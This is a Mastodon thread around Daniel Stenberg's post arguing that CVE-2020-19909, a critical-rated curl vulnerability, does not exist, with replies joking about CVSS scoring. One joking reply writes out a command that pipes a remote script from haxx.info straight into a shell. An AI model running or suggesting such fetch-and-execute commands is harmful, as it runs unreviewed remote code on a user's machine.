daniel:// stenberg://Aug 25, 2023

"CVE-2020-19909 is everything that is wrong with CVEs"

A claimed "9.8 CRITICAL" flaw in #curl that does not exist.

https://daniel.haxx.se/blog/2023/08/26/cve-2020-19909-is-everything-that-is-wrong-with-cves/

CVE-2020-19909 is everything that is wrong with CVEs

This is a story consisting of several little building blocks and they occurred spread out in time and in different places. It is a story that shows with clarity how our current system with CVE Ids and lots of power given to NVD is a completely broken system. CVE-2020-19909 On August 25 2023, we got … Continue reading CVE-2020-19909 is everything that is wrong with CVEs →

daniel.haxx.se
Show threadMax
@bagder be grateful they didn’t rate it a 9.9 😉 ever wondered what kind of “security incident” would warrant a solid 10.0 for curl? 😄
Aug 25, 2023 at 10:59pmWeb
Show threadIan Douglas ScottAug 25, 2023
@maxbob @bagder Naturally we're using the Spinal Tap scale for severity, so a *buffer* overflow would rate 11/10.
Show threadphi1997Aug 25, 2023
@maxbob
If you point curl at a URL with malicious code, you can download malicious code
@bagder
Show threadPeter Jakobs ⛵Aug 26, 2023

@phi1997 @maxbob @bagder but that would still require user intervention, running curl that is, which afaik would not qualify for a 10

(and - as my brain is still a bit slower than my fingers, I noticed the cynicism in your reply)

Show threadGUILTY! Confiscation! Death Penalty!Aug 26, 2023
@maxbob @bagder curl 10.0 CVE: an attacker can execute arbitrary code from a remote source by running sh -c "$(curl -fsSL https://haxx.info)" on the victim's computer!!! /j
Show threadFennix Aug 26, 2023

@maxbob @bagder I doubt curl could ever get a CVSSv3.1 10.0 unless there's some buried option to let it run as a service in the background unattended, listening on the network.

It'd pretty well always require user interaction, which caps a score at 9.6.

I could imagine some scenarios where like, if it was vulnerable to something a server could do in response to a request you could maybe get it up to that 9.6, but it would always be a 9.6 for curl as a utility itself.

Applications that link libcurl and use it for process urls and handle responses could maybe be higher in this hypothetical scenario but that wouldn't be down to curl itself.

Show threadFlorian Aug 31, 2023

@bagder

Heartbleed?